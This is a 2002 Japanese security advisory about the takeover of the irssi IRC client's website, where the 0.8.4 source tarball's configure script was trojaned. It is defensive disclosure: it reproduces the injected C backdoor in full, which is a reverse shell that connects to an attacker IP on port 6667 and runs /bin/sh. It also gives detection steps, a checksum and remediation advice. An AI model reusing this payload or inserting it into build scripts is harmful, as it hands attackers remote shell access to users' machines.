irssiウェブサイトが乗っ取られ、ソースコードにバックドアが仕掛けられる

◆概要：　2002年3月中旬、Timo Sirainen氏のUnix向けオープンソースモジュールIRCクライアント、irssiをホストしているサーバーの設定スクリプトに対し、リモートユーザーがirssiのインストールされているホストでコマンドを実行できるバックドアが仕掛けられた。

国際海外情報

2002年6月7日（金） 12時00分

◆概要：
　2002年3月中旬、Timo Sirainen氏のUnix向けオープンソースモジュールIRCクライアント、irssiをホストしているサーバーの設定スクリプトに対し、リモートユーザーがirssiのインストールされているホストでコマンドを実行できるバックドアが仕掛けられた。

　IPアドレスが204.120.36.206、209.164.15.215の攻撃者はリモートでコマンドを実行できた。さらに、irssi 0.8.4のリリース後から短期間、irssiの設定スクリプトがトロイの木馬に改造されていた。設定スクリプトに追加されたデータは以下の通り。

int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}

/* HP/UX 9 (%@#!) writes to sscanf strings */

memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);

}dup2(s, 0); dup2(s, 1); dup2(s, 2);

/* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */

{ char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }

◆情報ソース：
・irssi Website ( http://real.irssi.org/?page=backdoor ), May 28, 2002
・BugTraq (Martin Ostlund, martin@webtech.se), May 25, 2002
・iDEFENSE Intelligence Operations, May 28, 2002

◆分析：
　（iDEFENSE米国）irssiがバックドア作成、データ改ざんをトロイの木馬に改ざんされた後にirssiをダウンロード、インストールしたユーザーは、無許可の攻撃者からコンピューターにアクセスされている可能性が高い。機密ファイルやパスワードの盗用、セキュリティ設定の変更などの被害を受けている可能性もある。

◆検知方法：
　irssi 0.8.4でこの問題が確認されている。バックドアは、ビルドバイナリーではなく、設定スクリプトにのみ仕掛けられている。バックドアが仕掛けられているか確認するには、当該製品のウェブサイト、 http://real.irssi.org/?page=backdoor で公表されている以下のリストを用いてチェックする。

・バイナリーからirssiをインストールした場合は安全である。
・Debianソースにはバックドアは仕掛けられていない。
・Nightlyソーススナップショットにはバックドアは仕掛けられていないようだ。
・CVSにはバックドアは仕掛けられていないようだ。
・irssi-0.8.4.tar.bz2ファイルにはバックドアは仕掛けられていないが、.gzには仕掛けられている。
・.bz2ファイルを使用していたが、FreeBSDポートにはバックドアは仕掛けられていない。 ? irssi/SILCクライアントにはバックドアは仕掛けられていない。
・irssiがirssi.orgからGLibソースをダウンロードした場合、ソースにはバックドアが仕掛けられている（irssiの設定スクリプトと同じ）。
・現在でもソースが使用可能な場合、設定スクリプト、grep SOCK_STREAMで確認する。何らかの行が返された場合には、バックドアが仕掛けられている。
・発表された元々のirssi-0.8.4.tar.gzのmd5のチェックサムは57bf9d89638be3d377be211f0b0d7049である。0.8.4aの場合も同様である。

◆暫定処置：
　全ての/bin/shプロセスを強制終了するか、再起動して、設定プロセスが実行されないようにする。

◆ベンダー情報：
　最新版の0.8.4aは、 http://real.irssi.org/?page=download#sources で入手可能。Sirainen氏はiDEFENSEに対し、これはサーバーが乗っ取られる前に発表されたバージョンであると語った。

※この情報はアイ・ディフェンス・ジャパン
　（ http://www.idefense.co.jp/ ）より提供いただいております。
　アイディフェンス社の iAlert サービスについて
　 http://shop.vagabond.co.jp/p-alt01.shtml
　情報の内容は以下の時点におけるものです。
　【18:44 GMT、05、28、2002】

《ScanNetSecurity》